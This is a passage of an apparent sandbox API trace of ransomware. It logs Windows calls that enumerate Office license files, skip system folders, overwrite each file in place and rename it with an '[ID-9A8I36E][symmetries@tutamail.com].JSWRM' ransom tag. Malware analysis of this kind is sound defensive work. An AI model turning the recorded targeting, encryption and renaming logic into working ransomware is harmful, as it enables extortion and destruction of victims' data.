lpNumberOfBytesWritten=0x345ec00*=0x2d60, lpOverlapped=0x0) returned 1 [0111.971] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0111.971] CloseHandle (hObject=0x45c) returned 1 [0111.971] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236800 [0111.971] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0111.971] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0111.971] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0d8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0111.971] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0111.971] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0111.971] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0111.971] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3d8 [0111.971] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3d8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0111.971] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3d8 | out: hHeap=0x1e0000) returned 1 [0111.971] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24c000 [0111.971] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f4d0 [0111.971] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c000 | out: hHeap=0x1e0000) returned 1 [0111.971] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0111.971] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioStdO365R_SubTest-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiostdo365r_subtest-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioStdO365R_SubTest-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiostdo365r_subtest-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0111.972] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f4d0 | out: hHeap=0x1e0000) returned 1 [0111.972] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236800 | out: hHeap=0x1e0000) returned 1 [0111.972] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236970 | out: hHeap=0x1e0000) returned 1 [0111.972] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0111.972] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0111.972] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xec776d44, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xec776d44, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xec881dbc, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2bab, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="VisioStdO365R_SubTrial-pl.xrm-ms", cAlternateFileName="VI438E~1.XRM")) returned 1 [0111.972] lstrcmpiW (lpString1="VisioStdO365R_SubTrial-pl.xrm-ms", lpString2=".") returned 1 [0111.972] lstrcmpiW (lpString1="VisioStdO365R_SubTrial-pl.xrm-ms", lpString2="..") returned 1 [0111.972] lstrcmpiW (lpString1="VisioStdO365R_SubTrial-pl.xrm-ms", lpString2="...") returned 1 [0111.973] lstrcmpiW (lpString1="VisioStdO365R_SubTrial-pl.xrm-ms", lpString2="windows") returned -1 [0111.973] lstrcmpiW (lpString1="VisioStdO365R_SubTrial-pl.xrm-ms", lpString2="recovery") returned 1 [0111.973] lstrcmpiW (lpString1="VisioStdO365R_SubTrial-pl.xrm-ms", lpString2="perflogs") returned 1 [0111.973] lstrcmpiW (lpString1="VisioStdO365R_SubTrial-pl.xrm-ms", lpString2="documents and settings") returned 1 [0111.973] lstrcmpiW (lpString1="VisioStdO365R_SubTrial-pl.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0111.973] lstrcmpiW (lpString1="VisioStdO365R_SubTrial-pl.xrm-ms", lpString2="system volume information") returned 1 [0111.973] lstrcmpiW (lpString1="VisioStdO365R_SubTrial-pl.xrm-ms", lpString2="msocache") returned 1 [0111.973] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c698 [0111.973] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioStdO365R_SubTrial-pl.xrm-ms", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0111.973] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0111.973] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioStdO365R_SubTrial-pl.xrm-ms", cchWideChar=32, lpMultiByteStr=0x22d260, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioStdO365R_SubTrial-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 32 [0111.973] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c698 | out: hHeap=0x1e0000) returned 1 [0111.973] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0111.973] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioStdO365R_SubTrial-pl.xrm-ms", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0111.973] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0111.973] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioStdO365R_SubTrial-pl.xrm-ms", cchWideChar=32, lpMultiByteStr=0x22d298, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioStdO365R_SubTrial-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 32 [0111.973] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0111.973] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236690 [0111.973] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236468 | out: hHeap=0x1e0000) returned 1 [0111.973] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0111.973] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0111.973] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236a28 [0111.973] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioStdO365R_SubTrial-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiostdo365r_subtrial-pl.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0111.974] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11179) returned 1 [0111.974] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0111.974] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2ba0) returned 0x24c1d0 [0111.974] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2ba0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2ba0, lpOverlapped=0x0) returned 1 [0111.976] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0111.976] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2ba0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2ba0, lpOverlapped=0x0) returned 1 [0111.976] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0111.976] CloseHandle (hObject=0x45c) returned 1 [0111.976] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236188 [0111.976] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0111.976] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0111.976] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0111.976] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0111.976] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0111.977] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0111.977] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a300 [0111.977] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a300, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0111.977] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a300 | out: hHeap=0x1e0000) returned 1 [0111.977] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236748 [0111.977] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23ddc8 [0111.977] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236748 | out: hHeap=0x1e0000) returned 1 [0111.977] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0111.977] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioStdO365R_SubTrial-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiostdo365r_subtrial-pl.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioStdO365R_SubTrial-pl.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiostdo365r_subtrial-pl.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0111.978] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ddc8 | out: hHeap=0x1e0000) returned 1 [0111.978] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236188 | out: hHeap=0x1e0000) returned 1 [0111.978] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236a28 | out: hHeap=0x1e0000) returned 1 [0111.978] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0111.978] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0111.978] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xec7e944d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xec7e944d, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xec8f44e1, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x5170, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="VisioStdO365R_SubTrial-ppd.xrm-ms", cAlternateFileName="VIDAD3~1.XRM")) returned 1 [0111.978] lstrcmpiW (lpString1="VisioStdO365R_SubTrial-ppd.xrm-ms", lpString2=".") returned 1 [0111.978] lstrcmpiW (lpString1="VisioStdO365R_SubTrial-ppd.xrm-ms", lpString2="..") returned 1 [0111.978] lstrcmpiW (lpString1="VisioStdO365R_SubTrial-ppd.xrm-ms", lpString2="...") returned 1 [0111.978] lstrcmpiW (lpString1="VisioStdO365R_SubTrial-ppd.xrm-ms", lpString2="windows") returned -1 [0111.978] lstrcmpiW (lpString1="VisioStdO365R_SubTrial-ppd.xrm-ms", lpString2="recovery") returned 1 [0111.978] lstrcmpiW (lpString1="VisioStdO365R_SubTrial-ppd.xrm-ms", lpString2="perflogs") returned 1 [0111.978] lstrcmpiW (lpString1="VisioStdO365R_SubTrial-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0111.978] lstrcmpiW (lpString1="VisioStdO365R_SubTrial-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0111.978] lstrcmpiW (lpString1="VisioStdO365R_SubTrial-ppd.xrm-ms", lpString2="system volume information") returned 1 [0111.978] lstrcmpiW (lpString1="VisioStdO365R_SubTrial-ppd.xrm-ms", lpString2="msocache") returned 1 [0111.978] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bda8 [0111.978] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioStdO365R_SubTrial-ppd.xrm-ms", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0111.978] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0111.978] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioStdO365R_SubTrial-ppd.xrm-ms", cchWideChar=33, lpMultiByteStr=0x22cdc8, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioStdO365R_SubTrial-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 33 [0111.978] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bda8 | out: hHeap=0x1e0000) returned 1 [0111.978] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bf60 [0111.978] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioStdO365R_SubTrial-ppd.xrm-ms", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0111.978] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0111.978] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioStdO365R_SubTrial-ppd.xrm-ms", cchWideChar=33, lpMultiByteStr=0x22d260, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioStdO365R_SubTrial-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 33 [0111.978] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bf60 | out: hHeap=0x1e0000) returned 1 [0111.978] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235bc8 [0111.978] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236690 | out: hHeap=0x1e0000) returned 1 [0111.978] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0111.978] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0111.978] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236ae0 [0111.979] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioStdO365R_SubTrial-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiostdo365r_subtrial-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0111.979] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=20848) returned 1 [0111.979] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0111.979] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5170) returned 0x24c1d0 [0111.979] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x5170, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x5170, lpOverlapped=0x0) returned 1 [0111.982] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0111.982] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x5170, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x5170, lpOverlapped=0x0) returned 1 [0111.982] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0111.982] CloseHandle (hObject=0x45c) returned 1 [0111.982] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235d38 [0111.982] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0111.982] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0111.982] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0111.982] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0111.982] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0111.982] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0111.982] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3f0 [0111.982] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3f0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0111.982] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3f0 | out: hHeap=0x1e0000) returned 1 [0111.982] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bda8 [0111.982] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f848 [0111.982] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bda8 | out: hHeap=0x1e0000) returned 1 [0111.982] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0111.982] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioStdO365R_SubTrial-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiostdo365r_subtrial-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioStdO365R_SubTrial-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiostdo365r_subtrial-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0111.983] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f848 | out: hHeap=0x1e0000) returned 1 [0111.983] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235d38 | out: hHeap=0x1e0000) returned 1 [0111.983] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236ae0 | out: hHeap=0x1e0000) returned 1 [0111.983] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0111.983] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0111.983] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xec79cf9c, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xec79cf9c, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xec91a74c, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d68, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="VisioStdO365R_SubTrial-ul-oob.xrm-ms", cAlternateFileName="VI35B4~1.XRM")) returned 1 [0111.984] lstrcmpiW (lpString1="VisioStdO365R_SubTrial-ul-oob.xrm-ms", lpString2=".") returned 1 [0111.984] lstrcmpiW (lpString1="VisioStdO365R_SubTrial-ul-oob.xrm-ms", lpString2="..") returned 1 [0111.984] lstrcmpiW (lpString1="VisioStdO365R_SubTrial-ul-oob.xrm-ms", lpString2="...") returned 1 [0111.984] lstrcmpiW (lpString1="VisioStdO365R_SubTrial-ul-oob.xrm-ms", lpString2="windows") returned -1 [0111.984] lstrcmpiW (lpString1="VisioStdO365R_SubTrial-ul-oob.xrm-ms", lpString2="recovery") returned 1 [0111.984] lstrcmpiW (lpString1="VisioStdO365R_SubTrial-ul-oob.xrm-ms", lpString2="perflogs") returned 1 [0111.984] lstrcmpiW (lpString1="VisioStdO365R_SubTrial-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0111.984] lstrcmpiW (lpString1="VisioStdO365R_SubTrial-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0111.984] lstrcmpiW (lpString1="VisioStdO365R_SubTrial-ul-oob.xrm-ms", lpString2="system volume information") returned 1 [0111.984] lstrcmpiW (lpString1="VisioStdO365R_SubTrial-ul-oob.xrm-ms", lpString2="msocache") returned 1 [0111.984] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c118 [0111.984] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioStdO365R_SubTrial-ul-oob.xrm-ms", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0111.984] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0111.984] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioStdO365R_SubTrial-ul-oob.xrm-ms", cchWideChar=36, lpMultiByteStr=0x22cdc8, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioStdO365R_SubTrial-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 36 [0111.984] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c118 | out: hHeap=0x1e0000) returned 1 [0111.984] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bf60 [0111.984] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioStdO365R_SubTrial-ul-oob.xrm-ms", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0111.984] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0111.984] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioStdO365R_SubTrial-ul-oob.xrm-ms", cchWideChar=36, lpMultiByteStr=0x22ce70, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioStdO365R_SubTrial-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 36 [0111.984] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bf60 | out: hHeap=0x1e0000) returned 1 [0111.984] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235c80 [0111.984] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235bc8 | out: hHeap=0x1e0000) returned 1 [0111.984] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0111.984] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0111.984] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236800 [0111.984] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioStdO365R_SubTrial-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiostdo365r_subtrial-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, 